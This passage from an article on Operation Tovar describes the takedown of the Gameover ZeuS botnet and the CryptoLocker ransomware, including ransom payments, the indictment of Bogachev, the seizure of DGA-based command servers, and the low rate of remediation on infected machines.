    Law enforcement officials discouraged people from paying the ransom since it would fund a criminal organization, but without backups many victims had little choice but to pay. A US police department paid $750 for two Bitcoins as ransom after CryptoLocker was installed on a system used for police reports and booking photos. CryptoLocker encrypts files using asymmetric encryption, making use of a public and a private key. Without the private key, located on the criminals’ servers, infected files probably cannot be decrypted.

    The Target

    Operation Tovar’s investigation began with a server in the UK. A trail of wire transfers, money mules, criminal servers, and at least one confidential source led investigators to Bogachev. He is a Russian citizen wanted on charges of conspiracy to participate in racketeering activity, bank fraud, conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to violate the Identity Theft and Assumption Deterrence Act, aggravated identity theft, conspiracy, computer fraud, wire fraud, and money laundering. The FBI estimates the financial toll of Gameover at over $100 million and another estimate is that more than $27 million in ransom payments were made in the first two months of CryptoLocker’s distribution.

    Obtaining an indictment against a Russian national who will likely never be extradited to the United States isn’t sufficient to put an end to a criminal organization. In 2011, Russian citizen Aleksandr Andreevich Panin was indicted in the US on 23 counts related to the development and distribution of SpyEye but was not arrested until 2013 when he flew through Hartsfield-Jackson Atlanta International Airport. The Russian government, in a travel warning to its citizens, specifically mentions Panin and recommends that Russians facing legal action in the US should refrain from travelling internationally.

    The Takeover

    Drawing on the technical expertise of its members, the Operation Tovar task force was able to exploit flaws in the design of Gameover’s P2P network to manipulate the peer list and redirect traffic to nodes under its control. The specific technical details have not been released to the public in order to prevent the criminals from regaining control.

    Gameover’s failsafe mechanism, the DGA that was supposed to have allowed the criminals to maintain control in the event of a P2P disruption, was reverse engineered by task force members. The FBI then obtained a restraining order to redirect any attempts to register those domains to a government-run server. Furthermore, US service providers are required to block connections to the Russian .ru domains generated by the DGA since the US has no jurisdiction to prevent their registration.

    CryptoLocker also used a DGA for determining C2 locations. The algorithm was reverse engineered and the C2 servers were identified and seized by the Operation Tovar task force. Due to the use of an asymmetric key algorithm, CryptoLocker victims whose files remain encrypted currently have no avenue of remediation.

    Operation Tovar’s success can be measured by two factors: (1) have the criminals regained control of their botnets, and (2) is the malware being removed from infected machines? While we can’t say for certain that the people responsible for Gameover and CryptoLocker have ceased all criminal activity, they have not regained control of the network disrupted by Operation Tovar. Based on this fact alone, the task force should be commended. Successful botnet disruptions are very challenging. Attempted takeovers of Kelihos have been undone after only two weeks.

    The remediation of infected machines is an even more difficult task. US-CERT has published a list of recommended actions and resources, and a number of the private companies involved in Operation Tovar have released scanning tools. The onus remains on individuals and organizations to use these resources to determine if they are infected and take the appropriate steps to remediate the problem. Statistics published by The Shadowserver Foundation show the number of machines infected with Gameover has remained essentially flat since the takeover. There are simply not enough people taking advantage of the resources available to remediate their systems.


    The task force has taken control of the C2 network and now some people may believe that the malware is neutered and no further action is required. It is important to remember that any malware is unauthorized code running on a computer. The integrity of the system is still compromised, regardless of who is in control of the botnet.